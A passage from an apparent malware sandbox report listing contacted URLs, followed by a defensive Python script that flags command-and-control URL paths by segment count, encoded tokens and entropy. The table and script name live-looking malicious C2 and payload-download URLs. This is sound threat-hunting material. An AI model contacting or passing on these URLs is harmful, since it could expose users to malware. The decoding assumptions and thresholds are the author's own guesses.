http://pronpepsipirpyamvioerd.com/manifest/t9KapG5Lp7Zt_2Fa57QG/GX7C0FfmRVPiI55eGvl/6x2VyI3ttROAIozUzpTtuU/djl44EXt9ama4/XR_2FoMg/DUUaeRp34H0CCf_2FqktcZq/z9PSxtll7Y/oj4uvWMlnUr2X5bcU/HYCHWM70nrfm/_2BgTKf7qxG/3cOw5VQBP7LVAf/95TW5v6vv1PzXG2YnDn_2/B53HOO92/81PS.snx | true | Avira URL Cloud: safe | unknown
http://online-docu-sign-st.com/yytr.png | true | Avira URL Cloud: malware | unknown
http://pronpepsipirpyamvioerd.com/manifest/8LuXDq_2BWfBiB/BEj6sfjtywNrZQzF5QZK7/NbbMkjR9SpGW28t6/1m9JUJz0exuG0Ws/6b83q2bcM1KtQpqf51/Z_2B1SUtN/P_2FDTQIaszfL7CFhXYP/tmsBI8pqKk7pm_2BfxZ/6rZJurPMhY6pGTLji_2FEt/IMZgEgmplBU7m/NokZx7zj/OP_2FSvKpKSMcRmuUdUVqR0/teCNe1.snx | true | Avira URL Cloud: safe | unknown
http://pronpepsipirpyamvioerd.com/favicon.ico | true | Avira URL Cloud: safe | unknown
0 | true | (none) | low
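
The three /manifest/ URLs are the C2 check-ins: the sandbox marks them malicious while the URL reputation column rates them "safe", so reputation alone would miss this traffic in a proxy log. What does stand out is their shape: many slash-separated segments of mixed-case alphanumerics, literal _2F and _2B tokens, and a meaningless extension (.snx). The hunt below is an added example, not from the report or the malware. It joins the path back into one string, treats _2F/_2B/_3D as stand-ins for the base64 characters / + = (an assumption about the encoding; the joined string then contains only the base64 alphabet, which the test checks), and flags URLs with enough opaque segments and high entropy. The thresholds and the two benign URLs are constructed; the block does not decrypt anything, the report contains no key.

```python
"""Structural hunt for the C2 URL shape in this report's 'Contacted URLs'.

Added example, not from the report or the malware. Assumptions: the tokens
_2F/_2B/_3D stand for the base64 characters / + = and the path separators
were inserted into that encoded string at arbitrary points, plus the
thresholds below.
"""
import math
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import urlsplit

ESCAPES = {"_2F": "/", "_2B": "+", "_3D": "="}     # assumed token -> base64 char
_SEGMENT = re.compile(r"^[A-Za-z0-9_]+$")           # opaque path element
_B64 = re.compile(r"^[A-Za-z0-9+/=]+$")


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def path_segments(url: str) -> List[str]:
    return [seg for seg in urlsplit(url).path.split("/") if seg]


def join_blob(segments: List[str]) -> str:
    """Concatenate the path, dropping the fake extension of the last element.

    Joining before un-escaping matters: a token can be split by a '/'. The
    second report URL ends one segment with '_2' and starts the next with 'B'.
    """
    if not segments:
        return ""
    last = segments[-1].rsplit(".", 1)[0]
    return "".join(segments[:-1]) + last


def score_url(url: str, min_segments: int = 5, min_entropy: float = 4.0) -> Dict[str, object]:
    """Per-URL features plus the final verdict under the assumed thresholds."""
    segs = path_segments(url)
    joined = join_blob(segs)
    has_escapes = any(tok in joined for tok in ESCAPES)
    blob = joined
    for tok, ch in ESCAPES.items():
        blob = blob.replace(tok, ch)
    opaque = bool(segs) and all(_SEGMENT.match(s.rsplit(".", 1)[0]) for s in segs)
    b64 = bool(_B64.match(blob))
    ent = shannon_entropy(blob)
    flagged = (len(segs) >= min_segments and has_escapes and opaque
               and b64 and ent >= min_entropy)
    return {"url": url, "segments": len(segs), "escapes": has_escapes,
            "b64_alphabet": b64, "entropy": round(ent, 2), "blob_len": len(blob),
            "flagged": flagged}


def flagged_urls(urls: List[str]) -> List[str]:
    return [u for u in urls if score_url(u)["flagged"]]


# The five URLs from the report's table, in order; the /manifest/ ones first.
REPORT_URLS = [
    "http://pronpepsipirpyamvioerd.com/manifest/epAdaEbgmyrS0/5cBg2_2F/5r8v5YqebG9_2BzXwQ53Or2/m_2BYyZlMo/Wjgc3SrdyI1oKZciJ/0VZWBVvz9ttQ/e_2BqGDPIqO/VywJMmm_2FxNKs/BOcG3xAwzit4RyHpLyJsr/vwEVLjnqkBMf1zrK/m34BDAlEVdkNvcp/4fnxbyz8Lb2BtkfzoG/Qmy6EiDgS/W_2BAz08nRnapN/NuB.snx",
    "http://pronpepsipirpyamvioerd.com/manifest/t9KapG5Lp7Zt_2Fa57QG/GX7C0FfmRVPiI55eGvl/6x2VyI3ttROAIozUzpTtuU/djl44EXt9ama4/XR_2FoMg/DUUaeRp34H0CCf_2FqktcZq/z9PSxtll7Y/oj4uvWMlnUr2X5bcU/HYCHWM70nrfm/_2BgTKf7qxG/3cOw5VQBP7LVAf/95TW5v6vv1PzXG2YnDn_2/B53HOO92/81PS.snx",
    "http://pronpepsipirpyamvioerd.com/manifest/8LuXDq_2BWfBiB/BEj6sfjtywNrZQzF5QZK7/NbbMkjR9SpGW28t6/1m9JUJz0exuG0Ws/6b83q2bcM1KtQpqf51/Z_2B1SUtN/P_2FDTQIaszfL7CFhXYP/tmsBI8pqKk7pm_2BfxZ/6rZJurPMhY6pGTLji_2FEt/IMZgEgmplBU7m/NokZx7zj/OP_2FSvKpKSMcRmuUdUVqR0/teCNe1.snx",
    "http://online-docu-sign-st.com/yytr.png",
    "http://pronpepsipirpyamvioerd.com/favicon.ico",
]
# Constructed benign URLs with deep paths and underscores, for contrast.
BENIGN_URLS = [
    "https://example.com/static/js/app.min.js",
    "https://example.com/docs/api/v2/users/list_all/index.html",
]

if __name__ == "__main__":
    for u in REPORT_URLS + BENIGN_URLS:
        s = score_url(u)
        print(s["flagged"], s["segments"], s["entropy"], s["blob_len"], u[:60])
```

The download URL http://online-docu-sign-st.com/yytr.png is not caught by this shape check and should not be: it is an ordinary path, and there the reputation verdict ("malware") is what works. The two checks are complementary, which is the point of keeping both columns of the table above.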